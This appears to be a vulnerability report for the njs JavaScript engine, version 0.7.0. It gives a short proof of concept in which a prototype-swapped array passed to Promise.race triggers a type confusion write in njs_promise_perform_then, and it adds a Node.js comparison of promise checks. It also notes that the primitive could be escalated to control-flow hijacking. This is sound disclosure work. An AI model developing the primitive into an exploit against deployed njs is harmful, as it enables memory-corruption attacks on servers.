Env
Version : 0.7.0
Git Commit : bb796f7b3f3b65a78248f3ba86d0929eb292ca8e
OS : Ubuntu 20.04
Configure : ./Configure --address-sanitizer=YES
Poc
function main() {
    // Executor that never settles the promise; the promise is only needed as a prototype.
    function v0(v1,v2) {
        return 1
    }
    var o = [1,2,3,4,5,6]
    const v1 = new Promise(v0);
    // The array now inherits from a real promise instance, so it looks like a promise
    // to a prototype-based check while its storage is still that of an array.
    o.__proto__= v1;
    const v5 = [o];
    // Promise.race resolves each element; njs treats o as a promise and writes into it.
    const v7 = Promise.race(v5);
    console.log(o)
}
main();
Analysis
The output of the above poc is as follows:
Promise [1,2,3,4.000000000000001,5,6]
If I comment out Promise.race(v5):
function main() {
    function v0(v1,v2) {
        return 1
    }
    var o = [1,2,3,4,5,6]
    const v1 = new Promise(v0);
    o.__proto__= v1;
    const v5 = [o];
    // Without the race() call nothing touches o's storage.
    // const v7 = Promise.race(v5);
    console.log(o)
}
main();
Then the output will be normal as follows:
Promise [1,2,3,4,5,6]
This is because njs_promise_perform_then has a type confusion vulnerability when handling promise objects: it assumes the object it is handed is a promise and executes data->is_handled = 1, writing the integer 1 into the is_handled field of data as if data were an njs_promise_data_t, although data may actually be of another type. In the PoC the write lands in the array's element storage: the fourth element changes from 4 to 4.000000000000001, which is 4.0 with its lowest mantissa bit set, exactly what a write of 1 into the low byte of that double looks like on a little-endian machine.
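The distinction the analysis above turns on, shown in a spec-conformant engine. This is an added example, not code from the report or from njs; it assumes Node.js (V8) as the reference engine and rebuilds the PoC's confused array. ECMAScript requires Promise.prototype.then to verify its receiver's [[PromiseState]] internal slot, so prototype-chain tests (instanceof, @@toStringTag) are fooled by the PoC's array while the internal-slot check is not, and Promise.race on that array rejects with a TypeError instead of writing into its storage.

```javascript
// Added example (not from the original report or from njs): run the report's
// confused object through a spec-conformant engine (Node.js) and show which
// checks tell a real promise apart from an object that merely inherits from one.

// The PoC's object: a plain array whose prototype is a real promise instance.
function makeConfusedArray() {
  const o = [1, 2, 3, 4, 5, 6];
  const p = new Promise(() => 1);   // pending forever, like v1 in the PoC
  Object.setPrototypeOf(o, p);      // equivalent to o.__proto__ = p
  return o;
}

// Copy the elements without touching o's prototype chain. Array.prototype is no
// longer on that chain, and species-aware methods such as Array.prototype.slice
// would try to construct a Promise, so a plain index loop is used instead.
function snapshot(o) {
  const out = [];
  for (let i = 0; i < o.length; i++) out.push(o[i]);
  return out;
}

// The receiver check then() performs: it throws a TypeError before doing
// anything else unless `this` really carries the promise internal slots. The
// derived promise is discarded with a no-op catch so that a rejected input never
// surfaces as an unhandled rejection.
function hasPromiseSlot(v) {
  try {
    Promise.prototype.then.call(v).catch(() => {});
    return true;
  } catch (e) {
    if (e instanceof TypeError) return false;
    throw e;
  }
}

// Three views of the same value. instanceof and @@toStringTag both consult the
// prototype chain and are fooled by the PoC's array; only the internal-slot
// check is reliable. This is the check the vulnerable njs code path lacks.
function classify(v) {
  return {
    instanceOfPromise: v instanceof Promise,
    toStringTag: Object.prototype.toString.call(v),
    hasPromiseSlot: hasPromiseSlot(v),
  };
}

// The PoC's Promise.race path. IsPromise(o) is false, so race() wraps o in a
// fresh promise; because o still inherits a then() method it is treated as a
// thenable and o.then(resolve, reject) is invoked from a job. That call fails
// the receiver check, so the resulting promise rejects with a TypeError and the
// array's storage is never written to.
async function raceOnNonPromise() {
  const o = makeConfusedArray();
  const before = snapshot(o);
  let rejection = null;
  try {
    await Promise.race([o]);
  } catch (e) {
    rejection = e;
  }
  return {
    rejectedWithTypeError: rejection instanceof TypeError,
    arrayUnchanged: JSON.stringify(snapshot(o)) === JSON.stringify(before),
  };
}

// Demo output when run directly with node.
console.log("confused array:", classify(makeConfusedArray()));
console.log("real promise:  ", classify(new Promise(() => {})));
raceOnNonPromise().then((result) => console.log("Promise.race:", result));
```

Run it with node: the confused array reports instanceOfPromise true and toStringTag "[object Promise]" but hasPromiseSlot false, the real promise reports all three true, and Promise.race rejects with a TypeError while the array keeps its six original elements. Node's util.types.isPromise exposes the same internal-slot check as a library call.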
To confirm the vulnerability, we deliberately change the confused data to the Symbol type, so that the stray write hits the non-writable njs_symbol_constructor and is reported as an error, as expected, instead of silently corrupting data. The same primitive can be used to confuse other object types and, combined with heap spraying, could be developed into control-flow hijacking.
Found by P1umer, Kotori, afang5472 @ IIE NeSE